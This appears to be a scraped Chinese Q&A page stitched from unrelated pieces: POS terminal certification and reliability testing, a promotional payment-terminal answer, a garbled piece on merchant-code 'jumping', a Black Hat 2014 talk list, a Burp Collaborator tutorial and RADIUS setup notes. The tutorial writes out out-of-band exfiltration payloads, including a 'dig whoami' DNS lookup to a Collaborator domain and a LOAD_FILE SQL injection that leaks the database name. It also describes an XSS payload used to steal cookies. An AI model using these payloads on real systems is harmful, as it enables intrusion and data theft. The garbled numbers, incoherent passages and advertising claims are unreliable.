pos机需要通过什么测试

pos机需要通过什么测试

普通的POS机需要通过3C认证

有带GSM模块，无线的，严则上还需要做入网许可认证及型号核准认证。

具体测试标准如下：

POS 机，都做些什么可靠性测试项目

POS机MTBF做的比较多

MTBF，即平均故障间隔时间，英文全称是“MeanTimeBetweenFailure”。是衡量一个产品（尤其是电器产品）的可靠性指标。单位为“小时”。它反映了产品的时间质量，是体现产品在规定时间内保持功能的一种能力。具体来说，是指相邻两次故障之间的平均工作时间，也称为平均故障间隔。它仅适用于可维修产品。同时也规定产品在总的使用阶段累计工作时间与故障次数的比值为MTBF。磁盘阵列产品一般MTBF不能低于50000小时。MTBF值是产品设计时要考虑的重要参数，可靠度工程师或设计师经常使用各种不同的方法与标准来估计产品的MTBF值。

运输pos机需要办理un383 测试标准吗

深圳普瑞赛思锂电电池检测认证回复：

UN383是指在联合国针对危险品运输专门制定的《联合国危险物品运输试验和标准手册》的第3部分38 3款，即要求锂电池运输前，必须要通过高度模拟、高低温循环、振动试验、冲击试验、 55℃外短路、撞击试验、过充电试验、强制放电试验，才能保证锂电池运输安全。如果锂电池与设备没有安装在一起，则还须通过12米自由跌落试验。

所以如果pos机包含锂电池是需要做UN383测试。

中付支付pos机可靠吗？小卖部能用么？

可靠，中付支付POS机是由中付支付经过反复测试检验，确认无问题后才推出的。中付支付POS机操作简单方便，无需传输线，只需要在有网的地方通过蓝牙连接便可使用。不仅是小卖部，中付支付POS机的研发场景大大满足酒店、娱乐、餐饮等多个支付场景需求,只要在其业务范围内，可以解决995%以上的支付问题，放心吧。

合利宝跳码了真的假的

合利宝跳码引热议，按理说合利宝还是比较靠谱的pos机了，但近段时间，关于合利宝的负面消息越来越多，甚至还出现了合利宝跳码现象。那么，合利宝跳码有什么危害吗？让我们一起来看看吧！

 合利宝跳码了真的假的

近期有很多网友讨论合利宝跳码，从论坛中不难发现，有网友就遇到了跳码现象。刷的是中午11:30-12:00，跳过封顶批发文具，跳过民生超市5411。最后给出的答案是美发，文体用品，电器，汽车服务。这四个时间段不能刷，你对应他给你的时间表，不要刷这个时间段的就行了。想对稳定一点的就是保险点就只刷餐饮，娱乐，酒店。

 合利宝跳码有什么危害吗

首先，商家的利益会受到损害，因为POS机的跳码会让商家原本消费的是A，账单会流向B商家，这样A商家的流量就会减少。

其次，这会损害银行的利益。毕竟，如果POS机不跳码，银行可能会向商户A收10元，如果跳码给商户B，银行可能只收2 - 3元，甚至什么都不收。

此外，它还会影响持卡人自身的利益。因为不同的商家对积分有不同的规则，比如A商家可能有积分，而B商家没有。如果POS机是跳码，商户A的消费会跳转到商户B，持卡人再多刷也无法累积积分。

 如何避免跳码pos机

1避免使用跳码的POS机，尽量在银行生产的机器上消费。这种业务基本上是一机一码，所以不是100%不跳。当然，并不是说第三方支付公司都在跳码，而是一些支付公司可以选择自己行业的商家!

2尽量避免跳码pos机消费使用第三方支付牌照的公司品牌的机器,现在,在整个行业口碑良好的pos机有开宝店,瑞银信，通易付，银盛通，联付宝，海科融通，付临门和汇付天下等，刷小额的还可以，但大额就可能会出现跳商户，尽量选择传统的大pos机,或电动版本签署了pos机基本上面所有的产品还可以,移动手机pos机跳商户最为严重，建议不要使用。

3避免代码跳转的POS机，并尝试少量消费。我做了POS机测试,发现一些POS机设置程序,如刷8000多包卡会跳,少于4500通常不跳,实际用户实际卡如果仔细查询后可以看到一些规则,99%的市场份额手刷品牌跳码现象。有点良心支付公司是最大的折扣商家,没有产品品牌,如直接跳转到用户甚至精神病医院如减免类商家,想知道一些银行但不喜欢这种信用卡POS机大小伤害任何承诺低费用上面所描述的那样,你会多一个心眼,标准成本率06,如果率低于060跳码只支付公司赚钱!

2014美国黑帽大会有哪些精彩的议题

加密类：

48 Dirty Little Secrets Cryptographers Don't Want You To Know

介绍Matasano公司的加密挑战赛中——Matasano crypto challenges()，48个攻击场景，攻击方式。

演讲者：Thomas Ptacek  Alex Balducci

无线类：

8021x and Beyond!

介绍IEEE 8021x以及其RADIUS/EAP协议漏洞，证明在用户授权接入网络前，通过80211的WPA Enterprise在RADIUS服务器远程执行代码。

演讲者：Brad Antoniewicz

ATTACKING MOBILE BROADBAND MODEMS LIKE A CRIMINAL WOULD

有关移动宽带modems的安全问题。议题会展示如何盈利，窃取敏感信息和持久的控制着这些设备。

演讲者： Andreas Lindh

Bringing Software Defined Radio to the Penetration Testing Community

作者研制了一种简单易用的工具来进行无线监听和植入。工具是使用GUN radio和scapy基于Software Defined Radio制作的。议题介绍可以用这个工具来方便进行无线安全评估。

演讲者：Jean-Michel Picod  Jonathan-Christofer Demay  Arnaud Lebrun

Hacking the Wireless World with Software Defined Radio – 20

我们身边的无线信号无处不在，想餐厅服务员的对讲机，建筑物门禁，汽车无线钥匙，消费者的，企业的，政府的，业余爱好者的。这个议题就是教你怎样“盲目”的收集任何RF(Radio Frequency)然后从物理层逆向出来。而且只需要用一些开源软件和廉价的无线电硬件。作者会你逆向出卫星通信，用mode S追踪到飞机，并3D可视化的展示出来。

演讲者：Balint Seeber

Point of Sale System Architecture and Security

本议题向观众展示POS机的组件如何操作，支付的流程如何以及哪些环节是有漏洞的。

演讲者：Lucas Zaichkowsky

银行：

A Journey to Protect Points-of-Sale

介绍PoS(points-of-sale)机是如何被攻陷的。议题介绍比较常见的威胁——memory scraping，介绍这是怎么实现的以及如何减少这种威胁。

演讲者：Nir Valtman

SAP, Credit Cards, and the Bird that Talks Too Much

本议题讲述 从被广泛运用在世界各大机构的SAP中提钱、支付信息和信用卡信息。

演讲者：Ertunga Arsal

移动方向：

A Practical Attack Against VDI Solutions

Virtual Desktop Infrastructure被认为是目前炒作得厉害的BYOD安全解决方案之一。本议题通过一个PoC证明在VDI平台应用场景下，恶意移动应用通过“截屏”窃取数据。通过模拟用户的交互行为，证明这种攻击方式不但可行而且有效。

演讲者：Daniel Brodie  Michael Shaulov

Android FakeID Vulnerability Walkthrough

2013年带来 MasterKey漏洞的团队，今天带来一个新的Android应用漏洞，允许恶意应用逃脱正常应用的sandbox，在用户不知情的情况下获得特定的安全特权。从而恶意应用可以窃取用户数据，恢复密码，在特定场景下甚至完全控制Android设备。这个漏洞影响所有2010年1月以后的Android( Android Eclair 21 )。

演讲者：Jeff Forristal

Cellular Exploitation on a Global Scale: The Rise and Fall of the Control Protocol

该议题展示了服务提供商(Service Providers)可以通过隐藏的被动的层面去控制你的设备( Android, iOS, Blackberry)，议题将曝光如何通过 Over-the-Air对主流的蜂窝平台网络(GSM/CDMA/LTE)进行远程执行代码。

演讲者：Mathew Solnik  Marc Blanchou

Exploiting Unpatched iOS Vulnerabilities for Fun and Profit

该议题曝光作者对最新版iOS(version 711), 的越狱过程。

演讲者： Yeongjin Jang  Tielei Wang  Byoungyoung Lee  Billy Lau

It Just (Net)works: The Truth About iOS 7's Multipeer Connectivity Framework

利用Multipeer Connectivity框架，iOS设备之间也可以在一定范围内通过蓝牙和点对点的Wi-Fi连接进行通讯。本议题主要探讨这种新型的通信方式存在的漏洞和威胁。

演讲者：Alban Diquet

Mobile Device Mianagement

本议题聚焦于“移动设备管理”MDM产品本身的漏洞。展示如何通过这些产品的漏洞窃取到敏感的信息。

演讲者：Stephen Breen

"Nobody is Listening to Your Phone Calls" Really A Debate and Discussion on the NSA's Activities

本议题主要讲述有关NSA监听的话题的争论。

演讲者：Mark Jaycox  J Michael Allen

Researching Android Device Security with the Help of a Droid Army

本议题讲述利用heterogeneous cluster来挖掘android的漏洞

演讲者： Joshua Drake

Sidewinder Targeted Attack Against Android in the Golden Age of Ad Libs

本议题将使用从Google Play下载的Android程序演示“Sidewinder 针对性攻击”。

演讲者：Tao Wei  Yulong Zhang

Static Detection and Automatic Exploitation of Intent Message Vulnerabilities in Android Applications

本议题中演讲者将介绍一系列可能出现在一般Android应用编程过程中的漏洞，和开发的针对这些漏洞的静态分析程序。

演讲者：Daniele Gallingani

Understanding IMSI Privacy

本议题中演讲者将展示一款低成本且易用的基于Android系统的隐私框架以保护用户隐私。

演讲者：Ravishankar Borgaonkar  Swapnil Udar

Unwrapping the Truth: Analysis of Mobile Application Wrapping Solutions

本议题将分析一些大公司提供的应用打包解决方案，研究为何这些打包方案能同时使用在iOS和Android设备中，并研究其安全性。

演讲者：Ron Gutierrez  Stephen Komal

VoIP Wars: Attack of the Cisco Phones

本议题中演讲者将现场演示使用他所编写的Viproy渗透测试工具包攻击基于思科VoIP解决方案的VoIP服务。

演讲者：Fatih Ozavci

恶意软件：

A Scalable, Ensemble Approach for Building and Visualizing Deep Code-Sharing Networks Over Millions of Malicious Binaries

如果可以重现恶意软件的Code-Sharing网络，那么我们就可以更多的了解恶意软件的上下文和更深入了解新出现的恶意软件。这个议题就是通过一个还原混淆而又简单全面的分析方法，对地址多态，打包技术，混淆技术进行分析评估(an obfuscation-resilient ensemble similarity ysis approach that addresses polymorphi, packing, and obfuscation by estimating code-sharing in multiple static and dynamic technical domains at once)这个议题会详细介绍这套算法。

演讲者：Joshua Saxe

badu-on-accessories-that-turn-evil

这个议题讨论一种新的USB恶意软件，它通过USB设备内的“控制芯片”来进行操作。例如可以通过重新编程来欺骗各种其他设备，以达到控制计算机，窃取数据或者监听用户。

演讲者：Karsten Nohl  Jakob Lell

Bitcoin Transaction Malleability Theory in Practice

关于比特币的“ Transaction Malleability ”漏洞

演讲者：Daniel Chechik  Ben Hayak

Dissecting Snake – A Federal Espionage Toolkit

本议题介绍分析恶意软件Snake(也称Turla或Uroburos)的几个重要方面，例如usermode-centric和kernel-centric架构，rootki能力，认证的CC流量，encrypted virtual volumes。

演讲者：Sergei Shevchenko

One Packer to Rule Them All: Empirical Identification, Comparison, and Circumvention of Current Antivirus Detection Techniques

如今很多防病毒解决方案都号称可以最有效的对方未知的和混淆的恶意软件，但是都没有具体能说清楚是怎么做到的。以至于作为掏钱买的付费者不知道如何选择。本议题通过“经验”来对这些方案的效果做一个展示。从而揭示新的检测方法是如何实现的。

演讲者：Alaeddine Meahi  Arne Swinnen

Prevalent Characteristics in Modern Malware

本议题讲述作者对当前流行的恶意软件逃避技术的研究。

演讲者：Rodrigo Branco  Gabriel Negreira Barbosa

The New Scourge of Ransomware: A Study of CryptoLocker and Its Friends

本议题将研究CryptoLocker和其他类似的勒索软件，研究我们能从这样的新威胁中学到什么。

演讲者：Lance James  John Bambenek

第 1 页：无线类     第 2 页：移动方向

第 3 页：恶意软件     第 4 页：物联网

第 5 页：windows相关     第 6 页：APT方向

第 7 页：web安全     第 8 页：反汇编

你可以去51cto  看看

Burp Collaborator 是 OAST的产物，它可以帮你实现对响应不可见和异步的一个漏洞检测。

目前 Burp 发布的新版本中默认携带了 Burp Collaborator 模块

Burp Collaborator 模型 参考上文带外攻击模型

Burp Collaborator 有自己专用域名 burpcollaboratornet ，类似于ceye平台，有一个权威DNS服务器，用户使用Collaborator模块时会给每一个用户会分配一个二级域名。

Burp Collaborator 只是一个客户端，我们可以使用 Burp 给我们配置的默认带外服务器，也可以使用自己私有的服务器。

Burp Collaborator 配置

可以选择使用默认的配置 外带服务器，也可以自己设置外带服务器

点击 Run health check 可以测试外带服务器服务是否正常

打开 Collaborator 客户端

使用 Client

使用 dig 查询 域名

<pre class="md-fences md-end-block ty-contain-cm modeLoaded" spellcheck="false" cid="n53" mdtype="fences" style="box-sizing: border-box; overflow: visible; font-family: var(--monospace); font-size: 09em; display: block; break-inside: avoid; text-align: left; white-space: normal; background-image: inherit; background-position: inherit; background-size: inherit; background-repeat: inherit; background-attachment: inherit; background-origin: inherit; background-clip: inherit; background-color: rgb(248, 248, 248); position: relative !important; border: 1px solid rgb(231, 234, 237); border-radius: 3px; padding: 8px 4px 6px; margin-bottom: 15px; margin-top: 15px; width: inherit; color: rgb(51, 51, 51); font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;" lang="">dig whoami 7jr9gk6gtnstix33jp6181eu2l8cw1burpcollaboratornet</pre>

查看 Client 返回的日志

可见，我们通过dig 查看DNS记录的方式，将whoami的命令携带发送到服务器。

使用Burp 提供的靶场，来介绍 Burp Collaborator的用法

工作原理

Burp Collaborator 生成唯一的域名，将它们以有效负载的形式发送到应用程序，并监视与这些域的任何交互。如果观察到来自应用程序的传入请求，那么就可以检测到对应的漏洞。

检测过程

将Burp Collaborator Client 的获取的域名 添加HTTP请求的 Referer位置 等待几秒 然后点击poll now 会看到应用程序启动的DNS 和HTTP交互

我这里使用 sqli 的靶场演示一下利用 burp Collaborator 实现DNSLog注入

前提条件： secure_file_priv 为空，（如果非空，只能读取对应目录下的文件）

select 1,2,LOAD_FILE(concat('\\\\',database(),'~','xwxb0b0bnpm5bnjbo19apeivpmvfj4burpcollaboratornet\\a')) --+

在 xss payload 中，添加自己burp collaborator 生成的域名

等待 管理员查看评论即可触发 xss payload 实现对cookie 的获取

还有更多用法，期待大家去发现，

RADIUS（Remote Authentication Dial In User Service，远程用户拨号认证服务）服务器提供了三种基本的功能：认证（Authentication）、授权（Authorization）和审计（Accounting），即提供了3A功能。其中审计也称为“记账”或“计费”。

要使用 RADIUS

服务器对WLAN无线路由器进行认证，您必须：

将WLAN无线路由器的 IP

地址添加到 RADIUS 服务器上。

在WLAN无线路由器中启用并指定

RADIUS 服务器。

将 RADIUS

用户名或组名添加到您的策略中。

要在配置中启用并指定

RADIUS 服务器。 

选择“无线”>“无线安全”。

将显示“无线安全”页面。

选择“WPA Enterprise

Mixed”选项卡。

选中“WPA Enterprise

Mixed”复选框。

在“IP 地址”文本框中，输入 RADIUS 服务器的 IP 地址。

在“端口”文本框中，输入RADIUS的端口号。

默认端口号为 1812。 较早的 RADIUS 服务器可能使用端口 1645。

在“口令 ”文本框中，输入 WLAN设备和 RADIUS

服务器之间的共享密码。

要添加备份 RADIUS 服务器，请选择“次服务器设置”选项卡，然后选中“启用次 RADIUS 服务器”。

重复步骤 4

- 11 以配置备份服务器。 请确保主 RADIUS 服务器和备份 RADIUS

服务器上的共享密码相同。

有关详细信息，请参阅使用备份认证服务器。

单击“应用”“保存”。

AD、LDAP提供目录服务，即类似于企业、人员黄页的东西，用户和组织的信息都被存放在上面，查找起来十分快捷，也可以理解成一种特殊的数据库。

RADIUS是一种C/S结构的协议，它的客户端最初就是NAS（Net Access Server）服务器，现在任何运行RADIUS客户端软件的计算机都可以成为RADIUS的客户端。RADIUS协议认证机制灵活，可以采用PAP、 CHAP或者Unix登录认证等多种方式。RADIUS是一种可扩展的协议，它进行的全部工作都是基于Attribute-Length-Value的向量进行的。RADIUS也支持厂商扩充厂家专有属性。用户接入NAS，NAS向RADIUS服务器使用Access-Require数据包提交用户信息，包括用户名、密码等相关信息，其中用户密码是经过MD5加密的，双方使用共享密钥，这个密钥不经过网络传播；RADIUS服务器对用户名和密码的合法性进行检验，必要时可以提出一个Challenge，要求进一步对用户认证，也可以对NAS进行类似的认证；如果合法，给NAS返回Access-Accept数据包，允许用户进行下一步工作，否则返回Access-Reject数据包，拒绝用户访问；如果允许访问，NAS向RADIUS服务器提出计费请求Account- Require，RADIUS服务器响应Account-Accept，对用户的计费开始，同时用户可以进行自己的相关操作。